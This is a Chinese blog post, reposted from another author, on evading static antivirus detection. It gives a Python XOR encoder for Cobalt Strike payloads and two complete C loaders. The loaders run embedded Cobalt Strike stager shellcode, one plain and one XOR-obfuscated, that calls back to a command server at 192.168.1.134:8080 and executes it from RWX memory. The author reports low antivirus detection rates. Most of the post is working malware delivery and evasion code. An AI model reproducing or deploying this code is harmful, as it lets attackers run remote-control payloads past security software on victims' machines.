静态恶意代码逃逸-学习一
Posted -zhong
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了静态恶意代码逃逸-学习一相关的知识,希望对你有一定的参考价值。
申明:
本文非原创 学习自: https://payloads.online/archivers/2019-11-10/1
0X01定义恶意代码
这里我们以cs载荷为例子
0X02 shellcode的定义
Shellcode是一段机器指令的集合,通常会被压缩至很小的长度,达到为后续恶意代码铺垫的作用。当然你可以通过msfvenom生成各种用于测试的shellcode。
0x03RAW文件
RAW 中文意思是原始的、未经加工的,通常使用Cobaltstrike生成的BIN文件。
RAW文件是可以直接进行字节操作读取的,因此加载到内存较为方便,通常我一般使用混淆的方式再生成一遍。
0X04C文件
C文件给出的是一个C语言中的字符数组,也是可以通过以字节单位操作的。
0X05组合
由于反病毒软件对于默认生成的文件查杀较为严格,我通常会采用混淆、加密解密的方式把载荷还原。
以下就是一个,用于把raw文件混淆,生成c语言数组的py代码
import sys from argparse import ArgumentParser, FileType def process_bin(num, src_fp, dst_fp, dst_raw): shellcode = ‘‘ shellcode_size = 0 shellcode_raw = b‘‘ try: while True: code = src_fp.read(1) if not code: break base10 = ord(code) ^ num base10_str = chr(base10) shellcode_raw += base10_str.encode() code_hex = hex(base10) code_hex = code_hex.replace(‘0x‘,‘‘) if(len(code_hex) == 1): code_hex = ‘0‘ + code_hex shellcode += ‘\\x‘ + code_hex shellcode_size += 1 src_fp.close() dst_raw.write(shellcode_raw) dst_raw.close() dst_fp.write(shellcode) dst_fp.close() return shellcode_size except Exception as e: sys.stderr.writelines(str(e)) def main(): parser = ArgumentParser(prog=‘Shellcode X‘, description=‘[XOR The Cobaltstrike PAYLOAD.BINs] > Author: rvn0xsy@gmail.com‘) parser.add_argument(‘-v‘,‘--version‘,nargs=‘?‘) parser.add_argument(‘-s‘,‘--src‘,help=u‘source bin file‘,type=FileType(‘rb‘), required=True) parser.add_argument(‘-d‘,‘--dst‘,help=u‘destination shellcode file‘,type=FileType(‘w+‘),required=True) parser.add_argument(‘-n‘,‘--num‘,help=u‘Confused number‘,type=int, default=90) parser.add_argument(‘-r‘,‘--raw‘,help=u‘output bin file‘, type=FileType(‘wb‘), required=True) args = parser.parse_args() shellcode_size = process_bin(args.num, args.src, args.dst, args.raw) sys.stdout.writelines("[+]Shellcode Size : {} ".format(shellcode_size)) if __name__ == "__main__": main()
这里我们执行
在payload.c中会看到raw文件里的每一个字节与10的异或运算出的C语言数组。
python encode.py -s payload.bin -d payloadbin.c -n 10 -r RAW
静态恶意代码逃逸(第二课)
0x01 关于Windows操作系统内存
这里还是稍微展开介绍一下,Windows操作系统的内存有三种属性,分别为:可读、可写、可执行,并且操作系统将每个进程的内存都隔离开来,当进程运行时,创建一个虚拟的内存空间,系统的内存管理器将虚拟内存空间映射到物理内存上,所以每个进程的内存都是等大的。 操作系统给予每个进程申请内存的权力,使用不同的API,申请的内存具有不同的涵义。 在进程申请时,需要声明这块内存的基本信息:申请内存大小、申请内存起始内存基址、申请内存属性、申请内存对外的权限等。 申请方式: HeapAlloc malloc VirtualAlloc new LocalAlloc …
0x02 申请内存API的关系
其实以上所有的内存申请方式都与VirtualAlloc有关,因为VirtualAlloc申请的单位是“页”。而Windows操作系统管理内存的单位也是“页”。
0x03 实现一次正常加载
这里用cs的shellcode演示
#include <Windows.h> // 入口函数 int wmain(int argc,TCHAR * argv[]){ int shellcode_size = 0; // shellcode长度 DWORD dwThreadId; // 线程ID HANDLE hThread; // 线程句柄 /* length: 800 bytes */ unsigned char buf[] = "xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52x57x8bx52x10x8bx42x3cx01xd0x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8bx58x20x01xd3xe3x3cx49x8bx34x8bx01xd6x31xffx31xc0xacxc1xcfx0dx01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xffxe0x58x5fx5ax8bx12xebx86x5dx68x6ex65x74x00x68x77x69x6ex69x54x68x4cx77x26x07xffxd5x31xffx57x57x57x57x57x68x3ax56x79xa7xffxd5xe9x84x00x00x00x5bx31xc9x51x51x6ax03x51x51x68x90x1fx00x00x53x50x68x57x89x9fxc6xffxd5xebx70x5bx31xd2x52x68x00x02x60x84x52x52x52x53x52x50x68xebx55x2ex3bxffxd5x89xc6x83xc3x50x31xffx57x57x6axffx53x56x68x2dx06x18x7bxffxd5x85xc0x0fx84xc3x01x00x00x31xffx85xf6x74x04x89xf9xebx09x68xaaxc5xe2x5dxffxd5x89xc1x68x45x21x5ex31xffxd5x31xffx57x6ax07x51x56x50x68xb7x57xe0x0bxffxd5xbfx00x2fx00x00x39xc7x74xb7x31xffxe9x91x01x00x00xe9xc9x01x00x00xe8x8bxffxffxffx2fx6fx34x63x56x00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x00x55x73x65x72x2dx41x67x65x6ex74x3ax20x4dx6fx7ax69x6cx6cx61x2fx35x2ex30x20x28x63x6fx6dx70x61x74x69x62x6cx65x3bx20x4dx53x49x45x20x39x2ex30x3bx20x57x69x6ex64x6fx77x73x20x4ex54x20x36x2ex31x3bx20x57x4fx57x36x34x3bx20x54x72x69x64x65x6ex74x2fx35x2ex30x3bx20x4dx41x54x50x3bx20x4dx41x54x50x29x0dx0ax00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x00x68xf0xb5xa2x56xffxd5x6ax40x68x00x10x00x00x68x00x00x40x00x57x68x58xa4x53xe5xffxd5x93xb9x00x00x00x00x01xd9x51x53x89xe7x57x68x00x20x00x00x53x56x68x12x96x89xe2xffxd5x85xc0x74xc6x8bx07x01xc3x85xc0x75xe5x58xc3xe8xa9xfdxffxffx31x39x32x2ex31x36x38x2ex31x2ex31x33x34x00x00x00x00x00"; // 获取shellcode大小 shellcode_size = sizeof(buf); /* VirtualAlloc( NULL, // 基址 800, // 大小 MEM_COMMIT, // 内存页状态 PAGE_EXECUTE_READWRITE // 可读可写可执行 ); */ char * shellcode = (char *)VirtualAlloc( NULL, shellcode_size, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); // 将shellcode复制到可执行的内存页中 CopyMemory(shellcode,buf,shellcode_size); hThread = CreateThread( NULL, // 安全描述符 NULL, // 栈的大小 (LPTHREAD_START_ROUTINE)shellcode, // 函数 NULL, // 参数 NULL, // 线程标志 &dwThreadId // 线程ID ); WaitForSingleObject(hThread,INFINITE); // 一直等待线程执行结束 return 0; }
运行
PS:倾旋大佬的exe但是就是16 然后现在是40几 看来很多杀软杀的不是技术 杀的是特征吧
0x04 实现一次混淆加载
使用之前的Python脚本混淆生成RAW文件,最后得到混淆后的数组:
#include <Windows.h> // 入口函数 int wmain(int argc,TCHAR * argv[]){ int shellcode_size = 0; // shellcode长度 DWORD dwThreadId; // 线程ID HANDLE hThread; // 线程句柄 /* length: 800 bytes */ unsigned char buf[] = "xf6xe2x83x0ax0ax0ax6ax83xefx3bxd8x6ex81x58x3ax81x58x06x81x58x1ex81x78x22x05xbdx40x2cx3bxf5x3bxcaxa6x36x6bx76x08x26x2axcbxc5x07x0bxcdxe8xfax58x5dx81x58x1ax81x48x36x0bxdax81x4ax72x8fxcax7ex40x0bxdax5ax81x42x12x81x52x2ax0bxd9xe9x36x43x81x3ex81x0bxdcx3bxf5x3bxcaxa6xcbxc5x07x0bxcdx32xeax7fxfex09x77xf2x31x77x2ex7fxe8x52x81x52x2ex0bxd9x6cx81x06x41x81x52x16x0bxd9x81x0ex81x0bxdax83x4ex2ex2ex51x51x6bx53x50x5bxf5xeax52x55x50x81x18xe1x8cx57x62x64x6fx7ex0ax62x7dx63x64x63x5ex62x46x7dx2cx0dxf5xdfx3bxf5x5dx5dx5dx5dx5dx62x30x5cx73xadxf5xdfxe3x8ex0ax0ax0ax51x3bxc3x5bx5bx60x09x5bx5bx62x9ax15x0ax0ax59x5ax62x5dx83x95xccxf5xdfxe1x7ax51x3bxd8x58x62x0ax08x6ax8ex58x58x58x59x58x5ax62xe1x5fx24x31xf5xdfx83xccx89xc9x5ax3bxf5x5dx5dx60xf5x59x5cx62x27x0cx12x71xf5xdfx8fxcax05x8exc9x0bx0ax0ax3bxf5x8fxfcx7ex0ex83xf3xe1x03x62xa0xcfxe8x57xf5xdfx83xcbx62x4fx2bx54x3bxf5xdfx3bxf5x5dx60x0dx5bx5cx5ax62xbdx5dxeax01xf5xdfxb5x0ax25x0ax0ax33xcdx7exbdx3bxf5xe3x9bx0bx0ax0axe3xc3x0bx0ax0axe2x81xf5xf5xf5x25x65x44x5ax45x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x0ax5fx79x6fx78x27x4bx6dx6fx64x7ex30x2ax47x65x70x63x66x66x6bx25x3fx24x3ax2ax22x69x65x67x7ax6bx7ex63x68x66x6fx31x2ax47x59x43x4fx2ax33x24x3ax31x2ax5dx63x64x6ex65x7dx79x2ax44x5ex2ax3cx24x3bx31x2ax5dx45x5dx3cx3ex31x2ax5ex78x63x6ex6fx64x7ex25x3fx24x3ax31x2ax47x4bx5ex5ax31x2ax47x4bx5ex5ax23x07x00x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx0ax62xfaxbfxa8x5cxf5xdfx60x4ax62x0ax1ax0ax0ax62x0ax0ax4ax0ax5dx62x52xaex59xefxf5xdfx99xb3x0ax0ax0ax0ax0bxd3x5bx59x83xedx5dx62x0ax2ax0ax0ax59x5cx62x18x9cx83xe8xf5xdfx8fxcax7exccx81x0dx0bxc9x8fxcax7fxefx52xc9xe2xa3xf7xf5xf5x3bx33x38x24x3bx3cx32x24x3bx24x3bx39x3ex0ax0ax0ax0ax0a"; // 获取shellcode大小 shellcode_size = sizeof(buf); /* 增加异或代码 */ for(int i = 0;i<shellcode_size; i++){ buf[i] ^= 10; } /* VirtualAlloc( NULL, // 基址 800, // 大小 MEM_COMMIT, // 内存页状态 PAGE_EXECUTE_READWRITE // 可读可写可执行 ); */ char * shellcode = (char *)VirtualAlloc( NULL, shellcode_size, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); // 将shellcode复制到可执行的内存页中 CopyMemory(shellcode,buf,shellcode_size); hThread = CreateThread( NULL, // 安全描述符 NULL, // 栈的大小 (LPTHREAD_START_ROUTINE)shellcode, // 函数 NULL, // 参数 NULL, // 线程标志 &dwThreadId // 线程ID ); WaitForSingleObject(hThread,INFINITE); // 一直等待线程执行结束 return 0; }
上线效果
V站查杀现在也还是只有4的查杀率
PSexec: 最近很浮躁 忘了最开始接触这个的初衷是什么
愿少年接下来的日子里 潜心习安全
日积月累
以上是关于静态恶意代码逃逸-学习一的主要内容,如果未能解决你的问题,请参考以下文章
2016-2017-1 20155215 信息安全技术 补课上测试